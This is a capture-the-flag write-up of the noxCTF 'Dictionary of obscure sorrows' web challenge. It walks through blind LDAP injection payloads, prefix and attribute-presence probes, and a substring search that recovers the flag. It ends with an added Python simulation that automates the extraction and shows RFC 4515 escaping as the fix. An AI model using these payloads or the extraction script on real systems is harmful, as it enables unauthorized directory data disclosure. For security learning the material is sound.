Tags: web ldap 

Rating: 5.0

# ▼▼▼Dictionary of obscure sorrows (Web: 902 points, 11/531 = 2.1%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
There are a lot of obscure sorrows in our world.
Your job is not to find those that are plain in sight;
You need to seek further, look deeper.
Find the word that can not be written.
The most obscure sorrow of them all.

http://54.152.220.222/
```

---

## 【Identify the vulnerability】

```
GET /word.php?page=*)(objectClass=*   ⇒ Normal response
GET /word.php?page=*)(objectClass=1   ⇒ Query returned empty
```

The `page` value evidently lands unescaped inside the server's LDAP search filter: `*)(objectClass=*` closes the application's own clause and appends one that every entry satisfies, so the page renders normally, while `*)(objectClass=1` appends one that no entry satisfies, so the result set is empty. Two payloads that flip the outcome like this give a boolean oracle, which is all the following steps need.

**LDAP injection!!**

---

## 【Search for flag】

Probe the first character of the searched value with a wildcard. `%4b*)(objectClass=*` decodes to `K*)(objectClass=*`, so the application's own clause becomes `(attr=K*)`, which is true whenever some entry's value starts with `K`: a normal response is a hit, an empty result means no entry starts with that letter. The prefixes that produced the normal page were:

```
GET /word.php?page=%4b*)(objectClass=* HTTP/1.1   K*
GET /word.php?page=%6b*)(objectClass=* HTTP/1.1   k*
GET /word.php?page=%4f*)(objectClass=* HTTP/1.1   O*
GET /word.php?page=%6f*)(objectClass=* HTTP/1.1   o*
GET /word.php?page=%56*)(objectClass=* HTTP/1.1   V*
GET /word.php?page=%76*)(objectClass=* HTTP/1.1   v*
GET /word.php?page=%57*)(objectClass=* HTTP/1.1   W*
GET /word.php?page=%77*)(objectClass=* HTTP/1.1   w*
GET /word.php?page=%41*)(objectClass=* HTTP/1.1   A*
GET /word.php?page=%61*)(objectClass=* HTTP/1.1   a*
GET /word.php?page=%4c*)(objectClass=* HTTP/1.1   L*
GET /word.php?page=%6c*)(objectClass=* HTTP/1.1   l*
GET /word.php?page=%53*)(objectClass=* HTTP/1.1   S*
GET /word.php?page=%73*)(objectClass=* HTTP/1.1   s*
GET /word.php?page=%59*)(objectClass=* HTTP/1.1   Y*
GET /word.php?page=%79*)(objectClass=* HTTP/1.1   y*
```

Upper- and lower-case pairs give the same answer because LDAP's usual caseIgnore matching rules compare case-insensitively, so one probe per letter would have been enough.

Compare with the words linked from the HTML: every letter that produced a hit is the initial of at least one listed word, which confirms that the probe is matching the word names.

```
/word.php?page=Koinophobia
/word.php?page=Klexos
/word.php?page=Kuebiko
/word.php?page=Onism
/word.php?page=Opia
/word.php?page=Vellichor
/word.php?page=Wytai
/word.php?page=Anemoia
/word.php?page=Ambedo
/word.php?page=Lalalalia
/word.php?page=Lachesism
/word.php?page=Lutalica
/word.php?page=Sonder
/word.php?page=Socha
/word.php?page=YuYi
```

The search also turned up an entry that is not linked from the page, WORDS, but it was not the flag:

```
/word.php?page=WORDS
```

---
## 【Search for other attribute values】

Requesting `/word.php` with no `page` parameter, or `/config.php` (found by guessing), returns an error that leaks the object class of the entries being searched:

`Missing RDN inside ObjectClass(document)`

So the entries' objectClass is `document`.

---

## 【Investigate attributes of ObjectClass】

Optional attributes of the `document` object class, taken from the Fujitsu directory manual:

`http://software.fujitsu.com/jp/manual/manualfiles/M050000/B1WN4901/02/irepac/irep0289.htm#document`

```
cn (commonName)
description
seeAlso
l (localityName)
o (organizationName)
ou (organizationalUnitName)
documentTitle
documentVersion
documentAuthor
documentLocation
documentPublisher
```

`document` (RFC 1274, the cosine schema) additionally has one required attribute, `documentIdentifier`, which is not in this list. Each attribute can be tested for presence with the injected filter `(attr=*)`: the same always-true trick as before, restricted to entries that actually carry the attribute.

---

Presence probe per attribute:

```
GET /word.php?page=*)(cn=*                ⇒ Query returned empty
GET /word.php?page=*)(description=*       ⇒ Normal response★
GET /word.php?page=*)(seeAlso=*           ⇒ Query returned empty
GET /word.php?page=*)(l=*                 ⇒ Query returned empty
GET /word.php?page=*)(o=*                 ⇒ Query returned empty
GET /word.php?page=*)(ou=*                ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=*     ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=*   ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*    ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★
```

Only `description` and `documentPublisher` are populated on the matched entries, so if the flag is stored in the directory it has to be in one of those two.

---

## 【exploit】

The flag format is known: `noxctf{●●●●●}`. A substring filter on `description`, the populated attribute most likely to hold free text, selects the entry that contains it (the match is case-insensitive, so the lowercase `noxctf` still finds `noxCTF`):

`GET /word.php?page=*)(description=*noxctf*`

The server answers with a 302 to `/`, but the redirect response still carries the rendered page and the flag is in its body, so don't let the client follow the redirect and discard it:

```
HTTP/1.1 302 Found
Date: Sat, 08 Sep 2018 23:41:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://54.152.220.222/
Content-Length: 3872
Content-Type: text/html; charset=UTF-8

<html><head>
<title>Lightweight Dictionary Of Obscure Sorrows</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/assets/css/main.css">
</head>
<body class="subpage">


<header id="header">
<h1>Dictionary of <span>Obscure Sorrows</span></h1>
Menu
</header>



<div id="main">


<section class="wrapper style1">
<div class="inner">
<header class="align-center">
<h2>ƢƢƢƢ</h2>

So many sorrows.


</header>
<div class="video">
<div class="video-wrapper">
<iframe width="560" height="315" src="https://www.youtube.com/embed/s6zR2T9vn2c" frameborder="0" allowfullscreen=""></iframe>
</div>


noxCTF{K1NG_0F_LD4P}


</div>


</div>
</section>


<section class="wrapper ">
<div class="inner">
<header class="align-center">
<h2>Even more obsure sorrows</h2>

You can click on any of the links below to reach some more interesting words.


</header>
</div>
</section>

</div>


<footer id="footer">
<div class="inner">
<div class="flex flex-3">
<div class="col">
<h3>Words</h3>


</div>
<div class="col">
<h3>Some more</h3>

</div>
<div class="col">
<h3>More words</h3>

</div>
</div>
</div>
<div class="copyright">

© Untitled. Design: TEMPLATED. Images: Coverr. Video: Coverr.
</div>
</footer>

<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/jquery.scrolly.min.js"></script>
<script src="/assets/js/skel.min.js"></script>
<script src="/assets/js/util.js"></script>
<script src="/assets/js/main.js"></script>


<nav id="menu">


</nav></body></html>
```

`noxCTF{K1NG_0F_LD4P}`
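All of the steps above (the true/false probes, the first-letter enumeration, the `(attr=*)` sweep and the substring search for the flag) are one blind-injection workflow. The script below is an added example, not code from the challenge or from the writeup: it stands up a toy in-memory directory with a minimal RFC 4515 filter evaluator, models `word.php` as a yes/no oracle, runs each step against it, and then shows the RFC 4515 value escaping that closes the hole. Everything about the server side is an assumption, in particular the filter shape `(&(documentIdentifier=<page>)(objectClass=document))`, the entry contents and the attribute the page name is matched on; the writeup shows none of these.

```python
"""Blind LDAP injection against a toy in-memory directory standing in for word.php.
Added example, not code from the challenge or the writeup. Assumption: word.php splices
the page parameter into (&(documentIdentifier=<page>)(objectClass=document))."""
import re
import string

# Constructed sample directory; the flag value is the one the writeup recovered.
DIRECTORY = [
    {"objectclass": ["document"], "documentidentifier": ["Sonder"],
     "description": ["The realization that every passerby has a vivid life"]},
    {"objectclass": ["document"], "documentidentifier": ["Klexos"],
     "description": ["The art of dwelling on the past"]},
    {"objectclass": ["document"], "documentidentifier": ["WORDS"],
     "description": ["A hidden entry that is not the flag"]},
    {"objectclass": ["document"], "documentidentifier": ["\u01a2\u01a2\u01a2\u01a2"],
     "description": ["So many sorrows. noxCTF{K1NG_0F_LD4P}"], "documentpublisher": ["noxCTF"]},
]

def parse(s):
    """Parse an RFC 4515 filter into a tree; trailing data is an error, as on a real server."""
    node, i = _parse(s, 0)
    if i != len(s):
        raise ValueError("trailing data")
    return node

def _parse(s, i):
    if s[i] != "(":
        raise ValueError("expected '('")
    if s[i + 1] == "&":  # AND is all this lab needs; '|' and '!' would parse the same way
        kids, i = [], i + 2
        while s[i] == "(":
            kid, i = _parse(s, i)
            kids.append(kid)
        if s[i] != ")":
            raise ValueError("unbalanced")
        return ("&", kids), i + 1
    j = s.index(")", i)  # a ')' inside a value must be escaped as \29, so this is the clause end
    attr, _, value = s[i + 1:j].partition("=")
    return ("=", (attr.lower(), value)), j + 1

def _unescape(v):  # RFC 4515 \xx hex escapes back to literal characters
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)

def matches(node, entry):
    kind, data = node
    if kind == "&":
        return all(matches(k, entry) for k in data)
    attr, value = data
    vals = entry.get(attr, [])
    if value == "*":  # presence filter
        return bool(vals)
    # An unescaped '*' is a wildcard, an escaped \2a a literal. Matching is case-insensitive
    # like LDAP's caseIgnore rules, which is why 'noxctf' found 'noxCTF' in the writeup.
    rx = ".*".join(re.escape(_unescape(p)) for p in value.split("*"))
    return any(re.fullmatch(rx, v, re.IGNORECASE | re.DOTALL) for v in vals)

def escape_filter_value(s):
    """RFC 4515 escaping of a filter value: this is the fix."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in s)

def build_filter(page, escape=False):
    """Vulnerable by default (assumed shape): the page name is spliced straight into the filter."""
    value = escape_filter_value(page) if escape else page
    return f"(&(documentIdentifier={value})(objectClass=document))"

def word_php(page, escape=False):
    """The oracle: 'normal' if any entry matches, 'empty' if none, 'error' for a bad filter."""
    try:
        node = parse(build_filter(page, escape))
    except (ValueError, IndexError):
        return "error"
    return "normal" if any(matches(node, e) for e in DIRECTORY) else "empty"

def is_injectable(oracle):
    """The writeup's two probes: an always-true clause keeps the page, an always-false one empties it."""
    return oracle("*)(objectClass=*") == "normal" and oracle("*)(objectClass=1") == "empty"

def present_attributes(oracle, attrs):
    """The writeup's (attr=*) sweep: which attributes exist on a matching entry."""
    return [a for a in attrs if oracle(f"*)({a}=*") == "normal"]

CHARSET = string.ascii_lowercase + string.digits + "_{}"  # lower-case only: matching is case-insensitive

def extract(oracle, attr, known="", stop=None, charset=CHARSET, max_len=48):
    """Recover values of `attr` one character at a time through the yes/no oracle. `known` may
    start with '*' (substring search); a branch ends on an exact match or at the `stop` char."""
    if stop is not None and known.endswith(stop):
        return [known.lstrip("*")]
    if len(known) >= max_len:
        return []
    out = []
    if stop is None and known and oracle(f"*)({attr}={known}") == "normal":
        out.append(known)  # exact match: a complete value
    for c in charset:
        if oracle(f"*)({attr}={known}{c}*") == "normal":
            out.extend(extract(oracle, attr, known + c, stop, charset, max_len))
    return out

if __name__ == "__main__":
    print("injectable:", is_injectable(word_php))
    print("identifiers:", extract(word_php, "documentIdentifier"))
    print("flag:", extract(word_php, "description", known="*noxctf{", stop="}"))
```

Two things the toy makes visible that the writeup only hints at. First, under caseIgnore matching the oracle cannot distinguish case, so recovered values come back case-folded (`noxctf{k1ng_0f_ld4p}`); the flag's real case has to be read from a rendered page, as the writeup did, and probing both `K*` and `k*` was redundant. Second, a value made of characters outside the probe charset, such as the `ƢƢƢƢ` title, cannot be enumerated by prefix at all, which is why going through `description` with a substring search was the productive route. With `escape=True` the same `*)(objectClass=*` payload becomes a literal string that matches nothing, which is the whole fix.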